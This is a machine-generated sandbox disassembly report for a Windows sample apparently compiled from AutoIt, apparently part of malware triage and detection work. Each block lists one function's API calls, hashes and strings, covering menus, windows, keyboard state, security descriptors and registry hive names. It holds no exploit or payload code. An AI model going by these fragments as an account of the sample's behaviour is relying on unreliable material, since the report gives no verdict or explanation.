                    • Instruction ID: 69aabd74fd31051de67460abd65d46bb528ec76875865d73b228f3a6a3b42feb
                    • Opcode Fuzzy Hash: 06db960ddd2f1b65b2e0f9d8a477ec5f15c76b58c1ac70e5ac11280978034adc
                    • Instruction Fuzzy Hash: 1161E372504305AFEB116F24D841B6977E5EB1A739F186139E801BF191DB34F940C762
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC4EC
                    • GetFocus.USER32 ref: 00EFC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 00EFC507
                    • _memset.LIBCMT ref: 00EFC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFC65D
                    • GetMenuItemCount.USER32(?), ref: 00EFC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 00EFC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFC744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: cd03c0323238ea401266ce8cb7d484e96d996a5d4319f49b8626bc208bacfb81
                    • Instruction ID: 0db9ba8d7ff0dc20299cd98c2347d7d4fcf896c0a9253ba57b99ea22921e3adc
                    • Opcode Fuzzy Hash: cd03c0323238ea401266ce8cb7d484e96d996a5d4319f49b8626bc208bacfb81
                    • Instruction Fuzzy Hash: DA817E70508309AFD710DF24CA84A7ABBE4FF88758F20592EFA95E7291D730D905CB92
                    APIs
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                      • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                      • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                      • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                      • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                      • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                      • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8458
                    • _memset.LIBCMT ref: 00EC846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC848C
                    • GetLengthSid.ADVAPI32(?), ref: 00EC849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00EC84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00EC8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8522
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC854A
                    • CopySid.ADVAPI32(00000000), ref: 00EC8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                    • Instruction ID: be1b65f47c1020efd1684c5baa67a75548ef60e1994f7e875b2d79b9e2cbc9bd
                    • Opcode Fuzzy Hash: 0bd8828145518d55b696a257bd090ae756cf68d21e84baec52270acc1d4a4d59
                    • Instruction Fuzzy Hash: F9613871900219AFDF109FA5DE45EAEBBB9FF48304F048169E815B7291DB729A06CF60
                    APIs
                    • GetDC.USER32(00000000), ref: 00EE76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00EE76BA
                    • SelectObject.GDI32(00000000,?), ref: 00EE76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE777B
                    • SelectObject.GDI32(00000006,?), ref: 00EE7783
                    • DeleteObject.GDI32(?), ref: 00EE778C
                    • DeleteDC.GDI32(00000006), ref: 00EE7793
                    • ReleaseDC.USER32(00000000,?), ref: 00EE779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 6ce9abad263abcd1b74e0580debaf20e6243c360ffdce1a3543eccc5047e7880
                    • Instruction ID: dac800ad4847e569d859dac71e2f96a421cfb37db70b4db3b4ed6fc85fa702e4
                    • Opcode Fuzzy Hash: 6ce9abad263abcd1b74e0580debaf20e6243c360ffdce1a3543eccc5047e7880
                    • Instruction Fuzzy Hash: 1B516B75904349EFCB15CFA9CC84EAEBBB9EF48710F14852EF999A7210D731A944CB60
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00EFFB78), ref: 00EDA0FC
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA11E
                    • __swprintf.LIBCMT ref: 00EDA177
                    • __swprintf.LIBCMT ref: 00EDA190
                    • _wprintf.LIBCMT ref: 00EDA246
                    • _wprintf.LIBCMT ref: 00EDA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
                    • Instruction ID: 6b7aae980be20341d69732b85561ec4b4f491e330966490a6c2b36c0fd9bae7e
                    • Opcode Fuzzy Hash: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
                    • Instruction Fuzzy Hash: 72518E72900209BACF15EBE0DD86EEEB7B9EF04300F245166F509721A1EB316F59DB61
                    APIs
                      • Part of subcall function 00E90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E76C6C,?,00008000), ref: 00E90BB7
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E76E5A
                      • Part of subcall function 00E759CD: _wcscpy.LIBCMT ref: 00E75A05
                      • Part of subcall function 00E9387D: _iswctype.LIBCMT ref: 00E93885
                    Strings
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 0bf905d874672a461a1ef353d63c24a19ec6bc638fdc035b4c672b4639d3f13e
                    • Instruction ID: 24a56b0d90f09518db61982938696e673995b8de745dfaa3a2bfa91bdd54e8ae
                    • Opcode Fuzzy Hash: 0bf905d874672a461a1ef353d63c24a19ec6bc638fdc035b4c672b4639d3f13e
                    • Instruction Fuzzy Hash: CA02AF311083419FC724EF24C881AAFBBE5FF89354F04991DF49AA72A1DB30E949CB52
                    APIs
                    • _memset.LIBCMT ref: 00E745F9
                    • GetMenuItemCount.USER32(00F36890), ref: 00EAD7CD
                    • GetMenuItemCount.USER32(00F36890), ref: 00EAD87D
                    • GetCursorPos.USER32(?), ref: 00EAD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00EAD8CA
                    • TrackPopupMenuEx.USER32(00F36890,00000000,?,00000000,00000000,00000000), ref: 00EAD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EAD8E9
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                    • Instruction ID: b0f775b47ad1a7b21c2d8e58b8b1b06c3619cdd2eecf029a150d509ea95a0046
                    • Opcode Fuzzy Hash: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                    • Instruction Fuzzy Hash: A9712A70604205BFEB248F64DC45FAABF64FF4A368F105216F529BA1E0C7B1AC10DB94
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    Strings
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                    • Instruction ID: 16ea6aa0ede1977d9d8b1b1b575009231c51d04411ae5aeb7095a92393be959d
                    • Opcode Fuzzy Hash: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                    • Instruction Fuzzy Hash: E6419A3010425ECFDF10EF94E891AFA3364AF11304F416494FE917B292DB30A95ADBA0
                    APIs
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00E77A84: _memmove.LIBCMT ref: 00E77B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED561C
                    Strings
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                    • Instruction ID: 24e413e796f57aa4aa9c3344ab684e2ed736a3ac97d16271acb700b1dd00ea0e
                    • Opcode Fuzzy Hash: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                    • Instruction Fuzzy Hash: B81104219501697AE720F661EC4ADFFBBBCEF92B00F40142AB854B20C1EEA18D05C5A2
                    APIs
                    Strings
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: be44acf3dc7b2a050111e4d1b91a8317e974c4f998c0c0b784968981692ece7e
                    • Instruction ID: c5888af7c9095394db142b3c2c610aa8505c26c6427cb012b3d42733c7e0307f
                    • Opcode Fuzzy Hash: be44acf3dc7b2a050111e4d1b91a8317e974c4f998c0c0b784968981692ece7e
                    • Instruction Fuzzy Hash: 7011F371904116AFCF24AB619C46EEA77ECDF80710F0411B6F504B2191EF719A868651
                    APIs
                    • timeGetTime.WINMM ref: 00ED521C
                      • Part of subcall function 00E90719: timeGetTime.WINMM(?,75C0B400,00E80FF9), ref: 00E9071D
                    • Sleep.KERNEL32(0000000A), ref: 00ED5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00ED526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED528E
                    • SetActiveWindow.USER32 ref: 00ED52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED52DA
                    • Sleep.KERNEL32(000000FA), ref: 00ED52E5
                    • IsWindow.USER32 ref: 00ED52F1
                    • EndDialog.USER32(00000000), ref: 00ED5302
                    Strings
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                    • Instruction ID: 0aa31bcd0c515c889be1829e400947ffb2890eb82ddec2a89ccf9d8f64c656ba
                    • Opcode Fuzzy Hash: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                    • Instruction Fuzzy Hash: 9C21C9B1104708AFEB146F71EC89A363B6AEF84357F042425F401F13B5DB619D09E761
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CoInitialize.OLE32(00000000), ref: 00EDD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00EDD8FC
                    • CoCreateInstance.OLE32(00F02D7C,00000000,00000001,00F2A89C,?), ref: 00EDD948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDD9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 00EDDA0F
                    • _memset.LIBCMT ref: 00EDDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00EDDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 00EDDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 00EDDAEB
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: 779de2154666006b974a60577237670b980299bc11ee2c0f5f3ac5d3de905d6b
                    • Instruction ID: dfb4d3df3c6db71cd4309e549573fc65cb780ade25403f9ee9d37542e295f5c0
                    • Opcode Fuzzy Hash: 779de2154666006b974a60577237670b980299bc11ee2c0f5f3ac5d3de905d6b
                    • Instruction Fuzzy Hash: 0CB1FA75A00119AFDB14DFA4C888DAEBBF9EF88314B049469F509EB351DB31ED46CB50
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00ED05A7
                    • SetKeyboardState.USER32(?), ref: 00ED0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00ED0632
                    • GetKeyState.USER32(000000A0), ref: 00ED0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00ED0678
                    • GetKeyState.USER32(000000A1), ref: 00ED0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00ED06B5
                    • GetKeyState.USER32(00000011), ref: 00ED06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00ED06EC
                    • GetKeyState.USER32(00000012), ref: 00ED06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00ED0723
                    • GetKeyState.USER32(0000005B), ref: 00ED0731
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                    • Instruction ID: 39eb21658ef583fc0fd9c676694148165ffc8466988e39c46f21e0843f586827
                    • Opcode Fuzzy Hash: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                    • Instruction Fuzzy Hash: 44512960A0478429FB34EBB094147EAAFF4DF01384F0C559BC9C27A7C2DA64DA4DCB51
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00ECC746
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00ECC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC835
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00ECC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECC8C1
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                    • Instruction ID: 3d988189d4510a04b39eccb62ac5fcfc28f1a42ce7e9bbe6a15b54e014cf5571
                    • Opcode Fuzzy Hash: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                    • Instruction Fuzzy Hash: 03514E71B00205AFDB18CF69DD89EAEBBB6EF88710F14812DF519E6290DB71A944CB50
                    APIs
                      • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E720D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00E7216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EABEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF5A
                    • DeleteObject.GDI32(00000000), ref: 00EABF6C
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                    • Instruction ID: 1e7962d6ea53ebf622661574d2dd559627c79350632d9db115d9a40a120d11b3
                    • Opcode Fuzzy Hash: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                    • Instruction Fuzzy Hash: E061C034201604EFCB359F15CC48B25B7F2FF49329F54E52CE246AA5A1C771A890EF60
                    APIs
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    • GetSysColor.USER32(0000000F), ref: 00E721D3
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                    • Instruction ID: dd75b999184dc3a6e4fee37c67cb8752e4311262d20a7e9ce21371f92e824f77
                    • Opcode Fuzzy Hash: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                    • Instruction Fuzzy Hash: E941B431101180AFDB215F68EC88BB937A5EF46335F249269FE69AA1F3C7318D42DB11
                    APIs
                    • CharLowerBuffW.USER32(?,?,00EFF910), ref: 00EDAB76
                    • GetDriveTypeW.KERNEL32(00000061,00F2A620,00000061), ref: 00EDAC40
                    • _wcscpy.LIBCMT ref: 00EDAC6A
                    Strings
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                    • Instruction ID: 929572990f28a11899f83c87fcd3d22fb6533c6578b2c2fabb626e6874dda639
                    • Opcode Fuzzy Hash: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                    • Instruction Fuzzy Hash: 7451A1301183019FC710EF14C881AAEB7E5EF84314F58A82EF496772A2DB31DE4ACA53
                    APIs
                    Strings
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 0f3e20c4df0172646b1cd263a3d7c2fe417eda9c0cae42486854bb98ab24d9be
                    • Instruction ID: 24f6ba366f84cba773d11d660b35f7d624e9f7e34d93e6d6b4474dc6cd01ad40
                    • Opcode Fuzzy Hash: 0f3e20c4df0172646b1cd263a3d7c2fe417eda9c0cae42486854bb98ab24d9be
                    • Instruction Fuzzy Hash: 3141E571604605AFEF24EBB4DC41E7673E4EF89304F20986EE64DFA292EA31E941D711
                    APIs
                    • _memset.LIBCMT ref: 00EF73D9
                    • CreateMenu.USER32 ref: 00EF73F4
                    • SetMenu.USER32(?,00000000), ref: 00EF7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7490
                    • IsMenu.USER32(?), ref: 00EF74A6
                    • CreatePopupMenu.USER32 ref: 00EF74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF74DD
                    • DrawMenuBar.USER32 ref: 00EF74E5
                    Strings
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                    • Instruction ID: 7570da1f70c66f49205a3063b333cf92ad25c08087a8b9315c67ccf737f7ac64
                    • Opcode Fuzzy Hash: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                    • Instruction Fuzzy Hash: 04415875A00209EFDB20DF65D884AEABBF5FF49315F144029EA65A7360D730AD14CB50
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00EF77D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF77E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00EF77EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF77FA
                    • DeleteDC.GDI32(00000000), ref: 00EF7803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00EF780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF782D
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                    • Instruction ID: a72b631b7c2bc06bc4d2c2cc66c72d72d778e0b3bcce595f20384ba73dc64c1c
                    • Opcode Fuzzy Hash: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
                    • Instruction Fuzzy Hash: 70318A32105219BFDF119FA5DC08FEA3B69EF89365F110225FA55B61A0CB31D821DBA4
                    APIs
                    • _memset.LIBCMT ref: 00E9707B
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • __gmtime64_s.LIBCMT ref: 00E97114
                    • __gmtime64_s.LIBCMT ref: 00E9714A
                    • __gmtime64_s.LIBCMT ref: 00E97167
                    • __allrem.LIBCMT ref: 00E971BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971D9
                    • __allrem.LIBCMT ref: 00E971F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9720E
                    • __allrem.LIBCMT ref: 00E97225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97243
                    • __invoke_watson.LIBCMT ref: 00E972B4
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 12bfc89b30320ef25891bfabd4c2ab489838032ebe219717e79482128fde77fc
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: FF7108B1A18706ABDB149F79CC41B5AB3E8AF55324F14523AF454FB2C1E770EA048790
                    APIs
                    • _memset.LIBCMT ref: 00ED2A31
                    • GetMenuItemInfoW.USER32(00F36890,000000FF,00000000,00000030), ref: 00ED2A92
                    • SetMenuItemInfoW.USER32(00F36890,00000004,00000000,00000030), ref: 00ED2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00ED2ADA
                    • GetMenuItemCount.USER32(?), ref: 00ED2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00ED2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00ED2B64
                    • GetMenuItemID.USER32(?,?), ref: 00ED2BA9
